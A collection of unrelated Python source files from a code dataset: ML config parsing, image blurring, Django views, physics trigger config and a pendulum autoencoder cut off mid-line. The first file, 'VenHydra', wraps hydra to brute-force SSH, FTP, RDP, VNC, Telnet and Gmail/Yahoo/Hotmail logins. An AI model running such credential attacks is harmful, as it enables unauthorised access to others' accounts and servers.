+{"seq_id":"221240718","text":"import os\nimport sys\n \nlist = \"\"\"\n \n========<[VenHydra]>========\n \n[1] VNC Bruteforce\n[2] SSH Bruteforce\n[3] FTP Bruteforce\n[4] TELNET Bruteforce\n[5] RDP Bruteforce\n[6] YAHOO Bruteforce\n[7] HOTMAIL Bruteforce\n[8] GMAIL Bruteforce\n \n\"\"\"\n \ndef vnc():\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -P %s -e n -t 1 %s vnc -V\" % (word, iphost))\n \ndef ftp():\n \n iphost = raw_input(\"[+] IP/Hostname : \")\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s %s ftp\" % (user, word, iphost))\n sys.exit()\ndef gmail():\n email = raw_input(\"[+] Email : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s -s 465 smtp.gmail.com smtp\" % (email, word))\n sys.exit()\n \ndef ssh():\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -l %s -P %s %s ssh\" % (user, word, iphost))\n sys.exit()\n \n \ndef telnet():\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -l %s -P %s %s telnet\" % (user, word, iphost))\n sys.exit()\n \ndef yahoo():\n email = raw_input(\"[+] Email : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp\" % (email, word))\n sys.exit()\ndef hotmail():\n email = raw_input(\"[+] Email : \")\n word = raw_input(\"[+] Wordlist : \")\n os.system(\"hydra -l %s -P %s -s 587 smtp.live.com smtp\" % (email, word))\n sys.exit()\n \ndef rdp():\n user = raw_input(\"[+] User : \")\n word = raw_input(\"[+] Wordlist : \")\n iphost = raw_input(\"[+] IP/Hostname : \")\n os.system(\"hydra -t 1 -V -f -l %s -P %s %s rdp\" % (user, word, iphost))\n sys.exit()\n \n \n \n####COD3D BY V3N0M\n \ndef main():\n v_dra = input(\"[+] Choose one: \")\n if v_dra == 1:\n vnc()\n elif v_dra == 2:\n ssh()\n elif v_dra == 3:\n ftp()\n elif v_dra == 4:\n telnet()\n elif v_dra == 5:\n rdp()\n elif v_dra == 6:\n yahoo()\n elif v_dra == 7:\n hotmail()\n elif v_dra == 8:\n gmail()\n else:\n print(\"Wrong Command\")\n \nif __name__ == \"__main__\":\n os.system('clear')\n print(list)\n \n main()\n","sub_path":"venHydra.py","file_name":"venHydra.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"131384732","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport io\nimport os\nimport sys\nfrom shutil import copyfile\nfrom dataset import Vocab, Embeddings, Replace\n\nclass Config():\n\n def __init__(self, argv):\n self.usage=\"\"\"usage: {}\n* -mdir FILE : directory to save/restore models\n\n -seq_size INT : sentences larger than this number of src/tgt words are filtered out [50]\n -batch_size INT : number of examples per batch [32]\n -seed INT : seed for randomness [1234]\n -debug : debug mode \n\n [LEARNING OPTIONS]\n* -trn FILE : training data\n -dev FILE : validation data\n\n -src_voc FILE : vocabulary of src words (needed to initialize learning)\n -tgt_voc FILE : vocabulary of tgt words (needed to initialize learning)\n -src_emb FILE : embeddings of src words (needed to initialize learning)\n -tgt_emb FILE : embeddings of tgt words (needed to initialize learning)\n\n -src_replace FILE : equivalent sequences (needed when -data_mode r)\n\n To compute src-side encoding vectors:\n -src_k1 INT : src kernel1 size [3]\n -src_k1_size INT : hidden units for src kernel1 [256]\n -src_k2 INT : src kernel2 size [3]\n -src_k2_size INT : hidden units for src kernel2 [256]\n or:\n -src_lstm_size INT : hidden units for src bi-lstm [0] (if activated convolutions are not used)\n\n To compute tgt-side encoding vectors:\n -tgt_k1 INT : tgt kernel1 size [3]\n -tgt_k1_size INT : hidden units for tgt kernel1 [256]\n -tgt_k2 INT : tgt kernel2 size [3]\n -tgt_k2_size INT : hidden units for tgt kernel2 [256] (MUST be equal to -src_k2_size)\n or:\n -tgt_lstm_size INT : hidden units for tgt bi-lstm [0] (if activated convolutions are not used)\n\n -lr FLOAT : initial learning rate [0.1]\n -lr_decay FLOAT : learning rate decay [0.9]\n -lr_method STRING : GD method either: adam, adagrad, adadelta, sgd, rmsprop [adagrad]\n -aggr TYPE : aggregation operation: sum, max, lse [lse]\n -r FLOAT : r for lse [1.0]\n -dropout FLOAT : dropout ratio [0.3]\n -net_mode STRING : mode (alignment, sentence) [alignment]\n -data_mode STRING : how data examples are generated (p: parallel, u:uneven, i:insert, r:replace d:delete) [p]\n -max_sents INT : Consider this number of sentences per batch (0 for all) [0]\n -n_epochs INT : train for this number of epochs [1]\n -report_every INT : report every this many batches [1000]\n\n [INFERENCE OPTIONS]\n* -model FILE : model to restore\n* -tst FILE : testing data\n -min_score FLOAT : min score to consider alignment [0.0]\n -min_seq INT : min sequence of consecutive unaligned src/tgt words to consider divergence [1]\n -show_matrix : output formatted alignment matrix (net_mode must be alignment)\n -show_svg : output alignment matrix using svg-like html format (net_mode must be alignment)\n -show_last : output source/target last vectors\n -show_aggr : output source/target aggr vectors\n -show_align : output source/target alignment matrix\n -fix INT : output INT corrected sentence pairs [0]\n -tau INT : min number of words for corrected sentences [2]\n -max_sim FLOAT : sentences with lower similarity score than this are fixed [0.1]\n\n- Options marked with * must be set. The rest have default values.\n- If -mdir exists in learning mode, learning continues after restoring the last model\n- Training data is shuffled at every epoch\n\"\"\".format(sys.argv.pop(0))\n\n self.emb_src = None # object with embeddings\n self.emb_tgt = None # object with embeddings\n\n self.src_voc = None\n self.tgt_voc = None\n self.src_emb = None\n self.src_replace = None\n self.tgt_emb = None\n self.src_voc_size = None\n self.tgt_voc_size = None\n self.src_emb_size = None\n self.tgt_emb_size = None\n self.mdir = None\n self.model = None\n self.trn = None\n self.dev = None\n self.tst = None\n\n self.src_k1 = 3\n self.src_k1_size = 256\n self.src_k2 = 3\n self.src_k2_size = 256\n\n self.tgt_k1 = 3\n self.tgt_k1_size = 256\n self.tgt_k2 = 3\n self.tgt_k2_size = 256\n\n self.src_lstm_size = 0\n self.tgt_lstm_size = 0\n\n self.aggr = \"lse\"\n self.r = 1.0\n self.dropout = 0.3\n self.lr = 0.1\n self.lr_decay = 0.9\n self.lr_method = \"adagrad\"\n\n self.seq_size = 50\n self.batch_size = 32\n self.max_sents = 0\n self.n_epochs = 1\n self.epoch = 0 # epochs already run\n self.seed = 1234\n self.report_every = 1000\n self.debug = False\n self.data_mode = \"p\"\n self.net_mode = \"alignment\"\n\n self.min_score = 0.0\n self.min_seq = 2\n self.remove_source = True\n self.remove_target = True\n self.show_matrix = False\n self.show_svg = False\n self.show_last = False\n self.show_aggr = False\n self.show_align = False\n self.fix = 0\n self.tau = 2\n self.max_sim = 0.1\n\n self.parse(sys.argv)\n\n tf.set_random_seed(self.seed)\n np.random.seed(self.seed)\n\n if not self.mdir:\n sys.stderr.write(\"error: Missing -mdir option\\n{}\".format(self.usage))\n sys.exit()\n\n if self.tst: self.inference()\n if self.trn: self.learn()\n return\n\n def inference(self):\n self.dropout = 0.0\n self.seq_size = 0\n if not os.path.exists(self.model + '.index'):\n sys.stderr.write('error: -model file {} cannot be find\\n'.format(self.model + '.index'))\n sys.exit()\n if not os.path.exists(self.tst):\n sys.stderr.write('error: -tst file {} cannot be find\\n'.format(self.tst))\n sys.exit()\n if not os.path.exists(self.mdir + '/topology'): \n sys.stderr.write('error: topology file: {} cannot be find\\n'.format(self.mdir + '/topology'))\n sys.exit()\n argv = []\n with open(self.mdir + \"/topology\", 'r') as f:\n for line in f:\n opt, val = line.split()\n argv.append('-'+opt)\n argv.append(val)\n self.parse(argv) ### this overrides options passed in command line\n\n ### read vocabularies\n self.voc_src = Vocab(self.mdir + \"/vocab_src\") \n self.voc_tgt = Vocab(self.mdir + \"/vocab_tgt\")\n self.replace_src = None\n return \n\n def learn(self):\n if not os.path.exists(self.trn):\n sys.stderr.write('error: -trn file {} cannot be find\\n'.format(self.trn))\n sys.exit()\n if self.dev is not None and not os.path.exists(self.dev):\n sys.stderr.write('error: -dev file {} cannot be find\\n'.format(self.dev))\n sys.exit()\n ###\n ### continuation\n ###\n if os.path.exists(self.mdir): \n if not os.path.exists(self.mdir + '/topology'): \n sys.stderr.write('error: topology file: {} cannot be find\\n'.format(self.mdir + '/topology'))\n sys.exit()\n if not os.path.exists(self.mdir + '/checkpoint'): \n sys.stderr.write('error: checkpoint file: {} cannot be find\\ndelete dir {} ???\\n'.format(self.mdir + '/checkpoint', self.mdir))\n sys.exit()\n\n argv = []\n with open(self.mdir + \"/topology\", 'r') as f:\n for line in f:\n opt, val = line.split()\n argv.append('-'+opt)\n argv.append(val)\n self.parse(argv) ### this overrides options passed in command line\n ### read vocabularies\n self.voc_src = Vocab(self.mdir + \"/vocab_src\") \n self.voc_tgt = Vocab(self.mdir + \"/vocab_tgt\")\n ### read replace\n if self.src_replace: self.replace_src = Replace(self.src_replace)\n else: self.replace_src = None\n ### update last epoch\n for e in range(999,1,-1):\n if os.path.exists(self.mdir+\"/epoch{}.index\".format(e)): \n self.epoch = e\n break\n print(\"learning continuation: last epoch is {}\".format(self.epoch))\n ###\n ### learning from scratch\n ###\n else:\n self.voc_src = Vocab(self.src_voc) ### read file or config/vocab_src if file is not set\n self.src_voc_size = self.voc_src.length\n self.voc_tgt = Vocab(self.tgt_voc) ### read file or config/vocab_tgt if file is not set\n self.tgt_voc_size = self.voc_tgt.length\n ### read replace\n if self.src_replace: self.replace_src = Replace(self.src_replace)\n else: self.replace_src = None\n\n if not os.path.exists(self.mdir): os.makedirs(self.mdir)\n #copy vocabularies\n copyfile(self.src_voc, self.mdir + \"/vocab_src\")\n copyfile(self.tgt_voc, self.mdir + \"/vocab_tgt\")\n #read embeddings\n self.emb_src = Embeddings(self.src_emb,self.voc_src) ### read file or use emb_src.length if file is not set\n self.src_emb_size = self.emb_src.dim\n self.emb_tgt = Embeddings(self.tgt_emb,self.voc_tgt) ### read file or use emb_tgt.length if file is not set\n self.tgt_emb_size = self.emb_tgt.dim\n #write topology file\n with open(self.mdir + \"/topology\", 'w') as f: \n for opt, val in vars(self).items():\n if opt.startswith(\"src\") or opt.startswith(\"tgt\") or opt==\"aggr\": f.write(\"{} {}\\n\".format(opt,val))\n print(\"learning from scratch\")\n return \n\n\n def parse(self, argv):\n while len(argv):\n tok = argv.pop(0)\n if (tok==\"-mdir\" and len(argv)):\n self.mdir = argv.pop(0)\n elif (tok==\"-model\" and len(argv)):\n self.model = argv.pop(0)\n elif (tok==\"-src_voc\" and len(argv)):\n self.src_voc = argv.pop(0)\n elif (tok==\"-tgt_voc\" and len(argv)):\n self.tgt_voc = argv.pop(0)\n elif (tok==\"-src_emb\" and len(argv)):\n self.src_emb = argv.pop(0)\n elif (tok==\"-tgt_emb\" and len(argv)):\n self.tgt_emb = argv.pop(0)\n elif (tok==\"-src_replace\" and len(argv)):\n self.src_replace = argv.pop(0)\n elif (tok==\"-src_voc_size\" and len(argv)):\n self.src_voc_size = int(argv.pop(0))\n elif (tok==\"-tgt_voc_size\" and len(argv)):\n self.tgt_voc_size = int(argv.pop(0))\n elif (tok==\"-src_emb_size\" and len(argv)):\n self.src_emb_size = int(argv.pop(0))\n elif (tok==\"-tgt_emb_size\" and len(argv)):\n self.tgt_emb_size = int(argv.pop(0))\n elif (tok==\"-trn\" and len(argv)):\n self.trn = argv.pop(0)\n elif (tok==\"-dev\" and len(argv)):\n self.dev = argv.pop(0)\n elif (tok==\"-tst\" and len(argv)):\n self.tst = argv.pop(0)\n elif (tok==\"-max_sents\" and len(argv)):\n self.max_sents = int(argv.pop(0))\n elif (tok==\"-debug\"):\n self.debug = True\n elif (tok==\"-seed\" and len(argv)):\n self.seed = int(argv.pop(0))\n elif (tok==\"-report_every\" and len(argv)):\n self.report_every = int(argv.pop(0))\n elif (tok==\"-n_epochs\" and len(argv)):\n self.n_epochs = int(argv.pop(0))\n\n elif (tok==\"-src_lstm_size\" and len(argv)):\n self.src_lstm_size = int(argv.pop(0))\n elif (tok==\"-tgt_lstm_size\" and len(argv)):\n self.tgt_lstm_size = int(argv.pop(0))\n\n elif (tok==\"-src_k1\" and len(argv)):\n self.src_k1 = int(argv.pop(0))\n elif (tok==\"-src_k2\" and len(argv)):\n self.src_k2 = int(argv.pop(0))\n elif (tok==\"-src_k1_size\" and len(argv)):\n self.src_k1_size = int(argv.pop(0))\n elif (tok==\"-src_k2_size\" and len(argv)):\n self.src_k2_size = int(argv.pop(0))\n elif (tok==\"-tgt_k1\" and len(argv)):\n self.tgt_k1 = int(argv.pop(0))\n elif (tok==\"-tgt_k2\" and len(argv)):\n self.tgt_k2 = int(argv.pop(0))\n elif (tok==\"-tgt_k1_size\" and len(argv)):\n self.tgt_k1_size = int(argv.pop(0))\n elif (tok==\"-tgt_k2_size\" and len(argv)):\n self.tgt_k2_size = int(argv.pop(0))\n\n elif (tok==\"-seq_size\" and len(argv)):\n self.seq_size = int(argv.pop(0))\n elif (tok==\"-batch_size\" and len(argv)):\n self.batch_size = int(argv.pop(0))\n elif (tok==\"-aggr\" and len(argv)):\n self.aggr = argv.pop(0)\n elif (tok==\"-r\" and len(argv)):\n self.r = float(argv.pop(0))\n elif (tok==\"-dropout\" and len(argv)):\n self.dropout = float(argv.pop(0))\n elif (tok==\"-lr\" and len(argv)):\n self.lr = float(argv.pop(0))\n elif (tok==\"-lr_decay\" and len(argv)):\n self.lr_decay = float(argv.pop(0))\n elif (tok==\"-lr_method\" and len(argv)):\n self.lr_method = argv.pop(0)\n elif (tok==\"-data_mode\" and len(argv)):\n self.data_mode = argv.pop(0)\n elif (tok==\"-net_mode\" and len(argv)):\n self.net_mode = argv.pop(0)\n\n elif (tok==\"-min_score\" and len(argv)):\n self.min_score = float(argv.pop(0))\n elif (tok==\"-min_seq\" and len(argv)):\n self.min_seq = int(argv.pop(0))\n elif (tok==\"-show_matrix\"):\n self.show_matrix = True\n elif (tok==\"-show_svg\"):\n self.show_svg = True\n elif (tok==\"-show_aggr\"):\n self.show_aggr = True\n elif (tok==\"-show_last\"):\n self.show_last = True\n elif (tok==\"-show_align\"):\n self.show_align = True\n elif (tok==\"-fix\" and len(argv)):\n self.fix = int(argv.pop(0))\n elif (tok==\"-tau\" and len(argv)):\n self.tau = int(argv.pop(0))\n elif (tok==\"-max_sim\" and len(argv)):\n self.max_sim = float(argv.pop(0))\n\n elif (tok==\"-h\"):\n sys.stderr.write(\"{}\".format(self.usage))\n sys.exit()\n else:\n sys.stderr.write('error: unparsed {} option\\n'.format(tok))\n sys.stderr.write(\"{}\".format(self.usage))\n sys.exit()\n\n if self.tgt_k2_size != self.src_k2_size: \n sys.stderr.write('error: -tgt_k2_size and -src_k2_size cannot be different\\n')\n sys.exit()\n\n if self.src_lstm_size > 0:\n self.src_k1 = 0\n self.src_k1_size = 0\n self.src_k2 = 0\n self.src_k2_size = 0\n\n if self.tgt_lstm_size > 0:\n self.tgt_k1 = 0\n self.tgt_k1_size = 0\n self.tgt_k2 = 0\n self.tgt_k2_size = 0\n\n self.npad_src = (self.src_k1 + self.src_k2) / 2 - 1 ### used to build datasets\n self.npad_tgt = (self.tgt_k1 + self.tgt_k2) / 2 - 1 ### used to build datasets\n\n\n def write_config(self):\n if not os.path.exists(self.mdir): \n os.makedirs(self.mdir)\n file = self.mdir + \"/epoch\"+str(self.epoch)+\".config\"\n with open(file,\"w\") as f:\n for name, val in vars(self).items():\n if name==\"usage\" or name.startswith(\"emb_\") or name.startswith(\"voc_\"): continue\n f.write(\"{} {}\\n\".format(name,val))\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":15943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406635477","text":"import threading\nimport cv2\nimport numpy as np\n\n\ndef get_menu():\n menu = \"\\n\"\n menu += \"1. Run\\n\"\n menu += \"2. Change number of threads\\n\"\n menu += \"3. Change kernel size\\n\"\n menu += \"0. Exit\\n\"\n return menu\n\n\nclass FilterThread(threading.Thread):\n def __init__(self, thread_id, start_index):\n threading.Thread.__init__(self)\n self.__thread_id = thread_id\n self.__start_index = start_index\n\n def run(self):\n row = self.__start_index // width\n col = self.__start_index % width\n\n for i in range(slave_size):\n # compute the mean value for current pixel\n red_sum = 0\n green_sum = 0\n blue_sum = 0\n\n for k in range(-half_size, half_size + 1):\n for l in range(-half_size, half_size + 1):\n if (0 <= row + k < height) and (0 <= col + l < width):\n red_sum += img[row + k, col + l, 2]\n green_sum += img[row + k, col + l, 1]\n blue_sum += img[row + k, col + l, 0]\n\n red_sum //= kernel_size * kernel_size\n green_sum //= kernel_size * kernel_size\n blue_sum //= kernel_size * kernel_size\n\n result[row, col] = [blue_sum, green_sum, red_sum]\n\n # move to the next pixel\n col += 1\n if col == width:\n col = 0\n row += 1\n\n print(\"Exit thread \" + str(self.__thread_id))\n\n\nimg = cv2.imread(\"images/source/kids.bmp\", cv2.IMREAD_COLOR)\nheight, width = img.shape[:2]\nresult = np.zeros((height, width, 3), np.uint8)\nimg_size = height * width\n\n\nnr_threads = 10\nkernel_size = 5\nmenu = get_menu()\nrun = True\nwhile run:\n print(\"\\nCurrent number of threads: \" + str(nr_threads))\n print(\"Current kernel size: \" + str(kernel_size))\n print(menu)\n\n command = input(\"Give command: \")\n\n if command == \"2\":\n nr_threads = int(input(\"Give the number of threads: \"))\n\n elif command == \"3\":\n kernel_size = int(input(\"Give the kernel size: \"))\n\n elif command == \"0\":\n run = False\n\n elif command == \"1\":\n threads = []\n master_size = img_size % (nr_threads - 1)\n slave_size = img_size // (nr_threads - 1)\n half_size = kernel_size // 2\n\n for i in range(nr_threads - 1):\n thread = FilterThread(i, i * slave_size)\n thread.start()\n threads.append(thread)\n\n # master computation\n start_index = (nr_threads - 1) * slave_size\n row = start_index // width\n col = start_index % width\n\n for i in range(master_size):\n # compute the mean value for current pixel\n red_sum = 0\n green_sum = 0\n blue_sum = 0\n\n for k in range(-half_size, half_size + 1):\n for l in range(-half_size, half_size + 1):\n if (0 <= row + k < height) and (0 <= col + l < width):\n red_sum += img[row + k, col + l, 2]\n green_sum += img[row + k, col + l, 1]\n blue_sum += img[row + k, col + l, 0]\n\n red_sum //= kernel_size * kernel_size\n green_sum //= kernel_size * kernel_size\n blue_sum //= kernel_size * kernel_size\n\n result[row, col] = [blue_sum, green_sum, red_sum]\n\n # move to the next pixel\n col += 1\n if col == width:\n col = 0\n row += 1\n\n for t in threads:\n t.join()\n\n cv2.imshow(\"Source image\", img)\n cv2.imshow(\"Blurred image\", result)\n cv2.waitKey(0)\n\n print(\"Exit main thread\")\n\n else:\n print(\"Invalid command\")\n","sub_path":"theads.py","file_name":"theads.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"307941226","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Category, Post\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\ndef news_all(request):\n post_all = Post.objects.filter(draft=True, published__lte=timezone.now()).order_by('-published')\n page = request.GET.get('page', 1)\n\n paginator = Paginator(post_all, 2)\n try:\n post_all = paginator.page(page)\n except PageNotAnInteger:\n post_all = paginator.page(1)\n except EmptyPage:\n post_all = paginator.page(paginator.num_pages)\n\n return render(request, 'news_all.html', {'post_all': post_all})\n\n\ndef category_detail(request, slug):\n category = Category.objects.get(slug=slug)\n post_category = Post.objects.filter(category=category, draft=True,\n published__lte=timezone.now()).order_by('-published')\n page = request.GET.get('page', 1)\n\n paginator = Paginator(post_category, 2)\n try:\n post_category = paginator.page(page)\n except PageNotAnInteger:\n post_category = paginator.page(1)\n except EmptyPage:\n post_category = paginator.page(paginator.num_pages)\n return render(request, 'category_detail.html', {'category': category, 'post_category': post_category})\n\n\ndef post_detail(request, slug):\n post = get_object_or_404(Post, slug=slug)\n return render(request, 'post.html', {'post': post})\n\n\ndef get_tags(request, slug):\n posts = Post.objects.get_queryset().filter(tags__slug=slug)\n return render(request, 'tag_page.html', {'posts': posts})\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"288973191","text":"from utils.decorators import singleton\nfrom models.error import Error\nfrom models.type_error import get_type_error\nfrom views.data_window import DataWindow\n\n\n@singleton\nclass ErrorController(object):\n def __init__(self):\n self._idError = 0\n self._errorsList = []\n\n def getList(self):\n return self._errorsList\n\n def destroy(self):\n self._idError = 0\n self._errorsList = []\n\n def add(self, noType, errorType, desc, line, column):\n numberError, description = get_type_error(noType)\n self._idError += 1\n description += desc\n\n self._errorsList.append(Error(self._idError, errorType, numberError,\n description, line, column))\n DataWindow().consoleTable(['Code', 'Description'],\n [[numberError, description]])\n","sub_path":"parser/team28/controllers/error_controller.py","file_name":"error_controller.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"346925460","text":"### @file\n#\n# Standard Di-electron\n#\n# @author P. Koppenburg Patrick.Koppenburg@cern.ch\n# @date 2008-07-15\n#\n##\n#OBSOLETE: REDIRECT TO TRACK FITTED ELECTRONS FOR NOW\n#SHOULD BE REMOVED ENTIRELY\nfrom Hlt2SharedParticles.TrackFittedDiElectron import TrackFittedDiElectron, TrackFittedDiElectronFromL0\n__all__ = ('DiElectron', 'DiElectronFromL0')\nDiElectron = TrackFittedDiElectron\nDiElectronFromL0 = TrackFittedDiElectronFromL0\n'''\nfrom Gaudi.Configuration import *\nfrom Configurables import CombineParticles\nfrom Hlt2SharedParticles.BasicParticles import Electrons\nfrom HltLine.HltLine import bindMembers, Hlt2Member\n\n__all__ = ( 'DiElectron' )\n\nHlt2SharedDiElectron = Hlt2Member( CombineParticles\n , \"DiElectron\"\n , Inputs = [ Electrons ]\n , DecayDescriptor = \"J/psi(1S) -> e+ e-\" \n , DaughtersCuts = {\"e+\" : \"(PT>300*MeV)\"}\n , CombinationCut = \"AALL\"\n , MotherCut = \"(VFASPF(VCHI2PDOF)<100)\"\n , WriteP2PVRelations = False\n )\n\nDiElectron = bindMembers( \"Shared\", [ Electrons, Hlt2SharedDiElectron ] )\n'''\n","sub_path":"Hlt/Hlt/Hlt2SharedParticles/python/Hlt2SharedParticles/DiElectron.py","file_name":"DiElectron.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"606855781","text":"import random as rd;import numpy as np;import sys as s;import pickle\nimport torch\nimport torch.nn as nn\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport math\n#-------------------------------------------------------------------------------\ndef DampedPend(b,k,t,m):\n if t==0:\n position=1\n else:\n dump=math.exp(-(b/2*m)*t)\n omega=np.sqrt(k/m)*np.sqrt(1-(b**2)/(4*m*k))\n osc=np.cos(omega*t)\n position = dump*osc\n return position\n#-------------------------------------------------------------------------------\n # GERANDO O BANCO DE DADOS SORTEANDO K E B NO SEU INTERVALO ESPECÍFICO\ndef Box_1_dataset_with_Constants(n_batch,batch_size,exemplos_por_batch):\n inp=[]; question=[]; m=1\n T=[i for i in range(0,50)]\n K=np.linspace(5, 11, num=50)\n B=np.linspace(0.5, 1.1, num=50)\n KK=[]; BB=[]\n# K=np.linspace(5, 11, num=100) #those are default values\n# B=np.linspace(0.5,1.1, num=100) #those are default values\n#''' THIS IS FOR A RANDOM CONFIG OF K AND B'''\n for i in range(n_batch):\n t=[]; position=[]; full=0\n while full!=batch_size:\n ki=rd.randint(0,49); bi=rd.randint(0,49)\n k=K[ki]; b=B[bi]\n KK.append(k); BB.append(b)\n y=[]; tpred=[]\n for l in T:\n yy=DampedPend(b,k,l,m)\n y.append(yy)\n tpred.append(l)\n plt.clf() #uncoment to graph\n plt.xlim([0, 12]) #uncoment to graph\n plt.ylim([-1, 1]) #uncoment to graph\n plt.plot(tpred,y) #uncoment to graph\n plt.pause(0.5) #uncoment to graph\n\n t.append(tpred)\n position.append(y)\n full+=1\n inp.append(position)\n question.append(t)\n KK=np.array(KK).reshape(n_batch,batch_size,1) # To works on scynet\n BB=np.array(BB).reshape(n_batch,batch_size,1) # To works on scynet\n Constantes=[KK,BB]\n inp=torch.as_tensor(inp)\n question=torch.as_tensor(question)\n plt.show()\n print('shape(question) =',np.shape(question))\n print('Constantes =',np.shape(Constantes))\n sys.exit()\n address = open(\"positions\",\"wb\")\n pickle.dump(inp, address)\n address.close()\n address = open(\"question\",\"wb\")\n pickle.dump(question, address)\n address.close()\n address = open(\"Constantes\",\"wb\")\n pickle.dump(Constantes, address)\n address.close()\n#Box_1_dataset_with_Constants(5,1000,50)\n#s.exit()\n#-----------------------------------------------------------------------\n#------------------LOAD DATA-----------------------------------------------------\n#-----------------------------------------------------------------------\ninp = pickle.load( open( \"positions\", \"rb\" ) )\nquestion= pickle.load( open( \"question\", \"rb\" ) )\nout = pickle.load( open( \"positions\", \"rb\" ) )\nConstantes = pickle.load( open( \"Constantes\", \"rb\" ) )\nK=Constantes[0];B=Constantes[1]\nn_batch=np.shape(inp)[0]\nbatch_size=np.shape(inp)[1]\nn_examples=np.shape(inp)[2]\n#-----------------------------------------------------------------------\n#plt.plot(question[0][0].detach().numpy(),out[0][0].detach().numpy())\n#plt.show();s.exit()\n#-------------------------------------------------------------------------------\n#------------------DEFINE O MODELO----------------------------------------------\n#-------------------------------------------------------------------------------\nclass Autoencoder(nn.Module):\n def __init__(self):\n # N, 50\n super().__init__()\n self.encoder = nn.Sequential(\n nn.Linear(50,400),\n nn.Tanh(),\n nn.Linear(400,300),\n nn.Tanh(),\n nn.Linear(300,200),\n nn.Tanh(),\n nn.Linear(200,3),\n nn.Tanh(),\n )\n self.project=nn.Linear(1,3)\n self.decoder=nn.Sequential(\n nn.Linear(6,100),\n nn.Tanh(),\n nn.Linear(100,200),\n nn.Tanh(),\n nn.Linear(200,450),\n nn.Tanh(),\n nn.Linear(450,50),\n nn.Tanh(),\n nn.Linear(50,1),\n )\n def forward(self, x, t):\n encoded = self.encoder(x)\n t=self.project(t)\n aux=torch.cat((encoded,t),1)\n decoded = self.decoder(aux)\n return decoded,encoded\n#-------------------------------------------------------------------------------\n#------------------INICIA CAMADAS DE PESOS ORTOGONAIS---------------------------\n#-------------------------------------------------------------------------------\nmodel = Autoencoder()\nfor m in model.modules():\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n nn.init.orthogonal_(m.weight)\ncriterion = nn.MSELoss() #segundo a investigar\noptimizer = torch.optim.Adam(model.parameters())#,lr=1e-4,weight_decay = 1e-5)\n#optimizer = torch.optim.SGD(model.parameters(),lr=1e-4,weight_decay = 1e-5)#,momentum=0.5)\n#-------------------------------------------------------------------------------\n#---------------------TREINO----------------------------------------------------\n#-------------------------------------------------------------------------------\ndef treine(epochs):\n inp = pickle.load( open( \"positions\", \"rb\" ) )\n question= pickle.load( open( \"question\", \"rb\" ) )\n out = pickle.load( open( \"positions\", \"rb\" ) )\n n_batch=np.shape(inp)[0]\n batch_size=np.shape(inp)[1]\n n_examples=np.shape(inp)[2]\n T=question[0,0]\n t=torch.as_tensor(np.zeros((batch_size,1)))\n answ=torch.as_tensor(np.zeros((batch_size,1)))\n indicedografico=0\n for epoch in range(epochs):\n for batch_idx in range(n_batch):\n inputs = inp[batch_idx]\n inputs=inputs.float()\n t=t.float()\n out=out.float()\n r=rd.randint(0,49)\n for i in range(batch_size):\n r=rd.randint(0,49)\n t[i][0]=question[batch_idx,i,r]\n answ[i][0]=inp[batch_idx,i,r]\n recon,latent = model(inputs,t)\n loss=torch.mean((recon-answ)**2)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch:{epoch+1},Loss:{loss.item():.4f}')\n#treine(10000)\n#-------------------------------------------------------------------------------\n#---------------------SAVE AND LOAD STATE---------------------------------------\n#-------------------------------------------------------------------------------\nPATH='Box1_state.pt' # esse aqui foi treinado por 10k epochs,\n #3 Latent e 6 project of dataset(5,500,50)\n#PATH='Box1_state.pt'\nmodel=Autoencoder()\n#torch.save(state, filepath)\nmodel.load_state_dict(torch.load(PATH))\n#-------------------------------------------------------------------------------\n#---------------------GRÁFICOS--------------------------------------------------\n#-------------------------------------------------------------------------------\ndef Predict_test_Scynet():\n t=torch.as_tensor(np.zeros((batch_size,1)))\n t=t.float()\n Y=np.zeros(50); T=[i for i in range(0,50)]\n for aux in range(0,n_batch):\n for rdn_batch in range(0,batch_size):\n YY=inp[aux][rdn_batch].detach().numpy()\n r=0\n for interval in range(0,49):\n for i in range(batch_size):\n t[i][0]=question[0,i,r]\n y,latent=model(inp[aux].float(),t)\n y=y.detach().numpy()[rdn_batch]\n Y[interval]=y\n r+=1\n plt.clf()\n plt.xlim([0, 50])\n plt.ylim([-1, 1])\n plt.plot(T,Y,label='predict',ls='dashed')\n plt.plot(T,YY,label='equation')\n #plt.scatter(T, Y,c='black',label='recon')\n #plt.scatter(T, YY,c='red',label='answ')\n plt.legend()\n plt.pause(0.03)\n #plt.close()\n plt.show()\nPredict_test_Scynet()\n#-------------------------------------------------------------------------------\ndef Latent_values_Scynet1():\n fig = make_subplots(rows=1, 